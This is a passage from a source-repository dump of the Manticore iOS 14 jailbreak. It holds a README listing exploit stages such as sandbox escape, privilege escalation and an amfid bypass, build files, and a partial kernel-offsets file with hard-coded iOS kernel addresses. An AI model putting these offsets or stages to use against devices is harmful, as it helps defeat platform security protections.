├── .github
└── workflows
│ └── main.yml
├── .gitignore
├── CONTRIBUTING.md
├── LICENSE
├── Makefile
├── README.md
├── manticore.xcodeproj
├── project.pbxproj
├── project.xcworkspace
│ ├── contents.xcworkspacedata
│ └── xcshareddata
│ │ └── IDEWorkspaceChecks.plist
├── xcshareddata
│ └── xcschemes
│ │ └── manticore.xcscheme
└── xcuserdata
│ ├── a21.xcuserdatad
│ └── xcschemes
│ │ └── xcschememanagement.plist
│ └── rpwnage.xcuserdatad
│ ├── xcdebugger
│ └── Breakpoints_v2.xcbkptlist
│ └── xcschemes
│ └── xcschememanagement.plist
└── manticore
├── AppDelegate.h
├── AppDelegate.m
├── Assets.xcassets
├── AccentColor.colorset
│ └── Contents.json
├── AppIcon.appiconset
│ ├── Contents.json
│ ├── Icon-App-20x20@1x.png
│ ├── Icon-App-20x20@2x.png
│ ├── Icon-App-20x20@3x.png
│ ├── Icon-App-29x29@1x.png
│ ├── Icon-App-29x29@2x.png
│ ├── Icon-App-29x29@3x.png
│ ├── Icon-App-40x40@1x.png
│ ├── Icon-App-40x40@2x.png
│ ├── Icon-App-40x40@3x.png
│ ├── Icon-App-60x60@2x.png
│ ├── Icon-App-60x60@3x.png
│ ├── Icon-App-76x76@1x.png
│ ├── Icon-App-76x76@2x.png
│ ├── Icon-App-83.5x83.5@2x.png
│ └── ItunesArtwork@2x.png
├── Contents.json
└── Package Managers
│ ├── Contents.json
│ ├── Cydia.imageset
│ ├── Contents.json
│ └── Cydia_logo.png
│ ├── Installer.imageset
│ ├── Contents.json
│ └── unnamed.jpeg
│ ├── Sileo.imageset
│ ├── Contents.json
│ └── laMqxYhl.jpeg
│ └── Zebra.imageset
│ ├── Contents.json
│ └── Zebra-Package-Manager-actualizado-a-la-version-11-con-una.jpeg
├── Base.lproj
├── LaunchScreen.storyboard
└── Main.storyboard
├── Exploit
├── KernelOffsets.c
└── cicuta
│ ├── LICENSE
│ ├── README.md
│ ├── cicuta_log.c
│ ├── cicuta_virosa.c
│ ├── descriptors_utils.c
│ ├── exploit_main.c
│ ├── exploit_utilities.c
│ ├── fake_element_spray.c
│ └── voucher_utils.c
├── Info.plist
├── Jailbreak
├── amfid.c
├── jailbreak.mm
├── kernel_utils.mm
├── rootfs.mm
└── utils.mm
├── ViewController.h
├── ViewController.m
├── de.lproj
├── LaunchScreen.strings
└── Main.strings
├── include
├── IOKitUser
│ └── IOKitLib.h
├── exploit
│ └── cicuta
│ │ ├── cicuta_log.h
│ │ ├── cicuta_virosa.h
│ │ ├── descriptors_utils.h
│ │ ├── exploit_main.h
│ │ ├── exploit_utilities.h
│ │ ├── fake_element_spray.h
│ │ └── voucher_utils.h
├── lib
│ ├── snappy
│ │ ├── IOKit.h
│ │ └── snappy.h
│ └── tq
│ │ ├── iosurface.h
│ │ ├── k_offsets.h
│ │ ├── k_utils.h
│ │ ├── kapi.h
│ │ ├── tq_common_p.h
│ │ ├── user_kernel_alloc.h
│ │ └── utils.h
├── manticore
│ ├── amfid.h
│ ├── jailbreak.h
│ ├── kernel_utils.h
│ ├── pac.h
│ ├── rootfs.h
│ └── utils.h
├── offset_finder
│ └── offset_finder.h
├── util
│ ├── alloc.h
│ ├── arm.h
│ ├── error.hpp
│ ├── file.h
│ ├── kutils.h
│ ├── log.hpp
│ ├── mach_vm.h
│ ├── plistutils.h
│ ├── sys_vers.h
│ └── util.h
└── xnu
│ ├── bsd
│ ├── net
│ │ └── route.h
│ └── sys
│ │ ├── kern_control.h
│ │ └── proc_info.h
│ ├── cs_common.h
│ ├── iokit
│ └── IOKit
│ │ ├── IOKitKeys.h
│ │ ├── IOReturn.h
│ │ ├── IOTypes.h
│ │ └── OSMessageNotification.h
│ ├── libsyscall
│ └── wrappers
│ │ └── libproc
│ │ └── libproc.h
│ └── mach_vm.h
├── ja.lproj
├── LaunchScreen.strings
└── Main.strings
├── lib
├── Bazad
│ ├── IOSurface.c
│ └── IOSurface.h
└── pattern_f
│ ├── iosurface.c
│ ├── k_offsets.c
│ ├── k_utils.c
│ ├── kapi_mem.c
│ ├── sys_darwin.c
│ ├── user_kernel_alloc.c
│ └── utils.c
├── main.m
├── manticore.entitlements
├── nl.proj
├── LaunchScreen.strings
└── Main.strings
├── offset_finder
└── offset_finder.mm
├── reton.xcdatamodeld
└── reton.xcdatamodel
│ └── contents
├── util
├── arm.m
├── log.mm
├── plistutils.mm
└── util.mm
└── zh-Hant.lproj
├── LaunchScreen.strings
└── Main.strings
/.github/workflows/main.yml:
--------------------------------------------------------------------------------
1 | name: Build
2 | on:
3 | workflow_dispatch:
4 | push:
5 | branches: [ amfid2 ]
6 |
7 | jobs:
8 | build:
9 | runs-on: macos-latest
10 |
11 | steps:
12 | - uses: actions/checkout@v2
13 | - name: Build
14 | run: |
15 | xcodebuild clean build ONLY_ACTIVE_ARCH=NO PRODUCT_BUNDLE_IDENTIFIER='dev.manticore.manticore' CODE_SIGNING_REQUIRED=NO CODE_SIGNING_ALLOWED="NO" -sdk iphoneos -scheme manticore -configuration Debug -derivedDataPath build
16 | ln -sf build/Build/Products/Debug-iphoneos Payload
17 | rm -rf Payload/Manticore.app/Frameworks
18 | zip -r9 Manticore.ipa Payload/Manticore.app
19 |
20 | - name: Upload a Build Artifact
21 | uses: actions/upload-artifact@v2.2.4
22 | with:
23 | name: Manticore.ipa
24 | path: "Manticore.ipa"
25 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | project.pbxproj
2 | *.DS_Store
3 | *.xcuserdatad
4 | build/
5 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributing
2 |
3 | When contributing to this repository, please first discuss the change you wish to make via issue,
4 | email, or any other method with the owners of this repository before making a change.
5 |
6 | Please note we have a code of conduct, please follow it in all your interactions with the project.
7 |
8 | ## Pull Request Process
9 |
10 | 1. Ensure any install or build dependencies are removed before the end of the layer when doing a
11 | build.
12 | 2. Update the README.md with details of changes to the interface, this includes new environment
13 | variables, exposed ports, useful file locations and container parameters.
14 | 3. Increase the version numbers in any examples files and the README.md to the new version that this
15 | Pull Request would represent. The versioning scheme we use is [SemVer](http://semver.org/).
16 | 4. You may merge the Pull Request in once you have the sign-off of two other developers, or if you
17 | do not have permission to do that, you may request the second reviewer to merge it for you.
18 |
19 | ## Code of Conduct
20 |
21 | ### Our Pledge
22 |
23 | In the interest of fostering an open and welcoming environment, we as
24 | contributors and maintainers pledge to making participation in our project and
25 | our community a harassment-free experience for everyone, regardless of age, body
26 | size, disability, ethnicity, gender identity and expression, level of experience,
27 | nationality, personal appearance, race, religion, or sexual identity and
28 | orientation.
29 |
30 | ### Our Standards
31 |
32 | Examples of behavior that contributes to creating a positive environment
33 | include:
34 |
35 | * Using welcoming and inclusive language
36 | * Being respectful of differing viewpoints and experiences
37 | * Gracefully accepting constructive criticism
38 | * Focusing on what is best for the community
39 | * Showing empathy towards other community members
40 |
41 | Examples of unacceptable behavior by participants include:
42 |
43 | * The use of sexualized language or imagery and unwelcome sexual attention or
44 | advances
45 | * Trolling, insulting/derogatory comments, and personal or political attacks
46 | * Public or private harassment
47 | * Publishing others' private information, such as a physical or electronic
48 | address, without explicit permission
49 | * Other conduct which could reasonably be considered inappropriate in a
50 | professional setting
51 |
52 | ### Our Responsibilities
53 |
54 | Project maintainers are responsible for clarifying the standards of acceptable
55 | behavior and are expected to take appropriate and fair corrective action in
56 | response to any instances of unacceptable behavior.
57 |
58 | Project maintainers have the right and responsibility to remove, edit, or
59 | reject comments, commits, code, wiki edits, issues, and other contributions
60 | that are not aligned to this Code of Conduct, or to ban temporarily or
61 | permanently any contributor for other behaviors that they deem inappropriate,
62 | threatening, offensive, or harmful.
63 |
64 | ### Scope
65 |
66 | This Code of Conduct applies both within project spaces and in public spaces
67 | when an individual is representing the project or its community. Examples of
68 | representing a project or community include using an official project e-mail
69 | address, posting via an official social media account, or acting as an appointed
70 | representative at an online or offline event. Representation of a project may be
71 | further defined and clarified by project maintainers.
72 |
73 | ### Enforcement
74 |
75 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
76 | reported by contacting the project team at [rpwnage@protonmail.com]. All
77 | complaints will be reviewed and investigated and will result in a response that
78 | is deemed necessary and appropriate to the circumstances. The project team is
79 | obligated to maintain confidentiality with regard to the reporter of an incident.
80 | Further details of specific enforcement policies may be posted separately.
81 |
82 | Project maintainers who do not follow or enforce the Code of Conduct in good
83 | faith may face temporary or permanent repercussions as determined by other
84 | members of the project's leadership.
85 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | BUNDLE := dev.manticore.manticore
2 |
3 | .PHONY: all clean
4 |
5 | all: clean
6 | xcodebuild clean build ONLY_ACTIVE_ARCH=NO PRODUCT_BUNDLE_IDENTIFIER='dev.manticore.manticore' CODE_SIGNING_REQUIRED=NO CODE_SIGNING_ALLOWED="NO" -sdk iphoneos -scheme manticore -configuration Debug -derivedDataPath build
7 | ln -sf build/Build/Products/Debug-iphoneos Payload
8 | rm -rf Payload/Manticore.app/Frameworks
9 | zip -r9 Manticore.ipa Payload/Manticore.app
10 |
11 | clean:
12 | rm -rf build Payload Manticore.ipa
13 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Manticore Jailbreak
2 | Manticore Jailbreak is a Free and Open-Source Jailbreak utility developed by the Manticore Team.
3 | Current compatibility: iOS 14.0 -> iOS 14.3 using cicuta_virosa exploit. The tool is a work-in-progress. Expect changes and expansions in the future.
4 |
5 | ## About us
6 | The Manticore Jailbreak is an independent jailbreaking tool for all devices, including A14 and below, running iOS 14.3 down to iOS 14.0.
7 | It's our goal to take back the "The most advanced jailbreak" title from unc0ver.
8 |
9 | [Official Manticore Discord Server](https://discord.com/invite/manticore)
10 |
11 | ## Completion
12 | - [x] Exploit Implementation (cicuta_virosa)
13 | - [x] Stable Exploit Primitives
14 | - [x] Sandbox escape
15 | - [x] Privilege escalation
16 | - [x] offset finder/dynamic offsets
17 | - [x] amfid bypass/patch
18 | - [x] amfid -> getting task port address
19 | - [x] rootfs remount
20 | - [ ] `jailbreakd` implementation
21 | - [ ] bootstrap/package manager installation
22 |
23 | ### Credits
24 | * [RPwnage](https://twitter.com/rpwnage)
25 | * [fugiefire](https://twitter.com/fugiefire)
26 | * [PwnedC99](https://twitter.com/pwnedc99)
27 | * [Pattern-F](https://twitter.com/pattern_f_) (Exploit and Stable Primitives)
28 | * [XerusDesign](https://twitter.com/xerusdesign) (UI Design/Concept)
29 | * [ModernPwner](https://twitter.com/ModernPwner) (Original Exploit)
30 |
--------------------------------------------------------------------------------
/manticore.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 |
2 |
4 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/manticore.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | IDEDidComputeMac32BitWarning
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/manticore.xcodeproj/xcshareddata/xcschemes/manticore.xcscheme:
--------------------------------------------------------------------------------
1 |
2 |
5 |
8 |
9 |
15 |
21 |
22 |
23 |
24 |
25 |
30 |
31 |
32 |
33 |
43 |
45 |
51 |
52 |
53 |
54 |
60 |
62 |
68 |
69 |
70 |
71 |
73 |
74 |
77 |
78 |
79 |
--------------------------------------------------------------------------------
/manticore.xcodeproj/xcuserdata/a21.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | manticore.xcscheme_^#shared#^_
8 |
9 | orderHint
10 | 0
11 |
12 | reton.xcscheme_^#shared#^_
13 |
14 | orderHint
15 | 0
16 |
17 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/manticore.xcodeproj/xcuserdata/rpwnage.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist:
--------------------------------------------------------------------------------
1 |
2 |
6 |
7 |
9 |
21 |
22 |
23 |
25 |
37 |
38 |
39 |
41 |
53 |
54 |
55 |
57 |
69 |
70 |
71 |
73 |
85 |
86 |
87 |
89 |
101 |
102 |
103 |
104 |
105 |
--------------------------------------------------------------------------------
/manticore.xcodeproj/xcuserdata/rpwnage.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | manticore.xcscheme_^#shared#^_
8 |
9 | orderHint
10 | 0
11 |
12 | reton.xcscheme_^#shared#^_
13 |
14 | orderHint
15 | 0
16 |
17 |
18 | SuppressBuildableAutocreation
19 |
20 | 23C704F025DB2EE80078DC37
21 |
22 | primary
23 |
24 |
25 |
26 |
27 |
28 |
--------------------------------------------------------------------------------
/manticore/AppDelegate.h:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.h
3 | // reton
4 | //
5 | // Created by Luca on 15.02.21.
6 | //
7 |
8 |
9 | #import
10 |
11 | @interface AppDelegate : UIResponder
12 |
13 | @property (strong, nonatomic) UIWindow *window;
14 |
15 |
16 | @end
17 |
--------------------------------------------------------------------------------
/manticore/AppDelegate.m:
--------------------------------------------------------------------------------
1 |
2 | #import "AppDelegate.h"
3 |
4 | @interface AppDelegate ()
5 |
6 | @end
7 |
8 | @implementation AppDelegate
9 |
10 |
11 |
12 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
13 |
14 | // Override point for customization after application launch.
15 | return YES;
16 | }
17 |
18 |
19 | - (void)applicationWillResignActive:(UIApplication *)application {
20 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
21 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
22 | }
23 |
24 |
25 | - (void)applicationDidEnterBackground:(UIApplication *)application {
26 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
27 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
28 | }
29 |
30 |
31 | - (void)applicationWillEnterForeground:(UIApplication *)application {
32 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
33 | }
34 |
35 |
36 | - (void)applicationDidBecomeActive:(UIApplication *)application {
37 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
38 | }
39 |
40 |
41 | - (void)applicationWillTerminate:(UIApplication *)application {
42 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
43 | }
44 |
45 |
46 | @end
47 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AccentColor.colorset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "colors" : [
3 | {
4 | "idiom" : "universal"
5 | }
6 | ],
7 | "info" : {
8 | "author" : "xcode",
9 | "version" : 1
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "filename" : "Icon-App-20x20@2x.png",
5 | "idiom" : "iphone",
6 | "scale" : "2x",
7 | "size" : "20x20"
8 | },
9 | {
10 | "filename" : "Icon-App-20x20@3x.png",
11 | "idiom" : "iphone",
12 | "scale" : "3x",
13 | "size" : "20x20"
14 | },
15 | {
16 | "filename" : "Icon-App-29x29@1x.png",
17 | "idiom" : "iphone",
18 | "scale" : "1x",
19 | "size" : "29x29"
20 | },
21 | {
22 | "filename" : "Icon-App-29x29@2x.png",
23 | "idiom" : "iphone",
24 | "scale" : "2x",
25 | "size" : "29x29"
26 | },
27 | {
28 | "filename" : "Icon-App-29x29@3x.png",
29 | "idiom" : "iphone",
30 | "scale" : "3x",
31 | "size" : "29x29"
32 | },
33 | {
34 | "filename" : "Icon-App-40x40@2x.png",
35 | "idiom" : "iphone",
36 | "scale" : "2x",
37 | "size" : "40x40"
38 | },
39 | {
40 | "filename" : "Icon-App-40x40@3x.png",
41 | "idiom" : "iphone",
42 | "scale" : "3x",
43 | "size" : "40x40"
44 | },
45 | {
46 | "filename" : "Icon-App-60x60@2x.png",
47 | "idiom" : "iphone",
48 | "scale" : "2x",
49 | "size" : "60x60"
50 | },
51 | {
52 | "filename" : "Icon-App-60x60@3x.png",
53 | "idiom" : "iphone",
54 | "scale" : "3x",
55 | "size" : "60x60"
56 | },
57 | {
58 | "filename" : "Icon-App-20x20@1x.png",
59 | "idiom" : "ipad",
60 | "scale" : "1x",
61 | "size" : "20x20"
62 | },
63 | {
64 | "filename" : "Icon-App-20x20@2x.png",
65 | "idiom" : "ipad",
66 | "scale" : "2x",
67 | "size" : "20x20"
68 | },
69 | {
70 | "filename" : "Icon-App-29x29@1x.png",
71 | "idiom" : "ipad",
72 | "scale" : "1x",
73 | "size" : "29x29"
74 | },
75 | {
76 | "filename" : "Icon-App-29x29@2x.png",
77 | "idiom" : "ipad",
78 | "scale" : "2x",
79 | "size" : "29x29"
80 | },
81 | {
82 | "filename" : "Icon-App-40x40@1x.png",
83 | "idiom" : "ipad",
84 | "scale" : "1x",
85 | "size" : "40x40"
86 | },
87 | {
88 | "filename" : "Icon-App-40x40@2x.png",
89 | "idiom" : "ipad",
90 | "scale" : "2x",
91 | "size" : "40x40"
92 | },
93 | {
94 | "filename" : "Icon-App-76x76@1x.png",
95 | "idiom" : "ipad",
96 | "scale" : "1x",
97 | "size" : "76x76"
98 | },
99 | {
100 | "filename" : "Icon-App-76x76@2x.png",
101 | "idiom" : "ipad",
102 | "scale" : "2x",
103 | "size" : "76x76"
104 | },
105 | {
106 | "filename" : "Icon-App-83.5x83.5@2x.png",
107 | "idiom" : "ipad",
108 | "scale" : "2x",
109 | "size" : "83.5x83.5"
110 | },
111 | {
112 | "filename" : "ItunesArtwork@2x.png",
113 | "idiom" : "ios-marketing",
114 | "scale" : "1x",
115 | "size" : "1024x1024"
116 | }
117 | ],
118 | "info" : {
119 | "author" : "xcode",
120 | "version" : 1
121 | }
122 | }
123 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@1x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@3x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@1x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@3x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@1x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@3x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@3x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@1x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-83.5x83.5@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-83.5x83.5@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/ItunesArtwork@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/ItunesArtwork@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "info" : {
3 | "author" : "xcode",
4 | "version" : 1
5 | }
6 | }
7 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "info" : {
3 | "author" : "xcode",
4 | "version" : 1
5 | }
6 | }
7 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Cydia.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "filename" : "Cydia_logo.png",
5 | "idiom" : "universal",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "scale" : "2x"
11 | },
12 | {
13 | "idiom" : "universal",
14 | "scale" : "3x"
15 | }
16 | ],
17 | "info" : {
18 | "author" : "xcode",
19 | "version" : 1
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Cydia.imageset/Cydia_logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/Package Managers/Cydia.imageset/Cydia_logo.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Installer.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "filename" : "unnamed.jpeg",
5 | "idiom" : "universal",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "scale" : "2x"
11 | },
12 | {
13 | "idiom" : "universal",
14 | "scale" : "3x"
15 | }
16 | ],
17 | "info" : {
18 | "author" : "xcode",
19 | "version" : 1
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Installer.imageset/unnamed.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/Package Managers/Installer.imageset/unnamed.jpeg
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Sileo.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "filename" : "laMqxYhl.jpeg",
5 | "idiom" : "universal",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "scale" : "2x"
11 | },
12 | {
13 | "idiom" : "universal",
14 | "scale" : "3x"
15 | }
16 | ],
17 | "info" : {
18 | "author" : "xcode",
19 | "version" : 1
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Sileo.imageset/laMqxYhl.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/Package Managers/Sileo.imageset/laMqxYhl.jpeg
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Zebra.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "filename" : "Zebra-Package-Manager-actualizado-a-la-version-11-con-una.jpeg",
5 | "idiom" : "universal",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "scale" : "2x"
11 | },
12 | {
13 | "idiom" : "universal",
14 | "scale" : "3x"
15 | }
16 | ],
17 | "info" : {
18 | "author" : "xcode",
19 | "version" : 1
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Zebra.imageset/Zebra-Package-Manager-actualizado-a-la-version-11-con-una.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/Package Managers/Zebra.imageset/Zebra-Package-Manager-actualizado-a-la-version-11-con-una.jpeg
--------------------------------------------------------------------------------
/manticore/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/manticore/Exploit/KernelOffsets.c:
--------------------------------------------------------------------------------
1 | //
2 | // k_offsets.c
3 | // ios-fuzzer
4 | //
5 | // Created by Quote on 2021/1/26.
6 | // Copyright © 2021 Quote. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 | #include "Common.h"
12 | #include "Utils.h"
13 | #define Q_INTERNAL
14 | #include "KernelOffsets.h"
15 |
16 | static void offsets_base_iOS_14_x()
17 | {
18 | kc_kernel_base = 0xFFFFFFF007004000;
19 |
20 | SIZE(ipc_entry) = 0x18;
21 | OFFSET(ipc_entry, ie_object) = 0x0;
22 |
23 | OFFSET(ipc_port, ip_bits) = 0x0;
24 | OFFSET(ipc_port, ip_references) = 0x4;
25 | OFFSET(ipc_port, ip_kobject) = 0x68;
26 |
27 | OFFSET(ipc_space, is_table_size) = 0x14;
28 | OFFSET(ipc_space, is_table) = 0x20;
29 |
30 | OFFSET(task, itk_space) = 0x330;
31 | OFFSET(task, bsd_info) = 0x3a0;
32 | OFFSET(task, t_flags) = 0x3f4;
33 |
34 | OFFSET(proc, task) = 0x10;
35 | OFFSET(proc, p_pid) = 0x68;
36 | OFFSET(proc, p_ucred) = 0xf0;
37 | OFFSET(proc, p_fd) = 0xf8;
38 |
39 | OFFSET(filedesc, fd_ofiles) = 0x00;
40 | OFFSET(fileproc, fp_glob) = 0x10;
41 | OFFSET(fileglob, fg_data) = 0x38;
42 | OFFSET(pipe, buffer) = 0x10;
43 |
44 | OFFSET(ucred, cr_posix) = 0x18;
45 |
46 | SIZE(posix_cred) = 0x60;
47 |
48 | OFFSET(OSDictionary, count) = 0x14;
49 | OFFSET(OSDictionary, capacity) = 0x18;
50 | OFFSET(OSDictionary, dictionary) = 0x20;
51 |
52 | OFFSET(OSString, string) = 0x10;
53 |
54 | OFFSET(IOSurfaceRootUserClient, surfaceClients) = 0x118;
55 | }
56 |
57 | static void offsets_iPhone6s_18A373() {
58 | offsets_base_iOS_14_x();
59 |
60 | kc_kernel_map = 0xFFFFFFF0070AA670;
61 | kc_kernel_task = 0xFFFFFFF0070A69C8;
62 | kc_IOSurfaceClient_vt = 0xFFFFFFF006E2EF40;
